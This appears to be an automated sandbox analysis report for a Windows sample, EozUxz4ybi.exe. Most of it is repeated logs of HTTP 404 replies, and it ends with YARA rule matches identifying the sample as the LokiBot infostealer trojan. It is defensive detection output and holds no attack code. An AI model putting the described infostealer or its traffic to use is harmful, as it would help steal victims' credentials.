Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:26 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:27 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:28 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:29 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:30 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:31 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:32 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:33 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:34 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:35 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:36 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:37 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:38 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:39 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:40 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:41 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:42 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:43 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:44 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:45 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:46 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:47 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:48 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:49 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:50 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:51 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:52 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:53 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:54 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:55 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:56 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:57 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:58 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:43:59 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:00 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:01 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:02 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:03 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:04 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:05 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:06 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:07 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:08 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:09 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:10 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:11 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:12 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:13 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:14 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:15 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:16 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:17 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:18 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:19 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:20 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:21 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:22 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:23 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:24 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Sat, 11 Jan 2025 00:44:25 GMTContent-Type: text/html; charset=utf-8Connection: closeX-Powered-By: PHP/5.4.16Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a Data Ascii: File not found.

Source: EozUxz4ybi.exe

String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: Loki Payload Author: kevoreilly
Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: EozUxz4ybi.exe, type: SAMPLE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
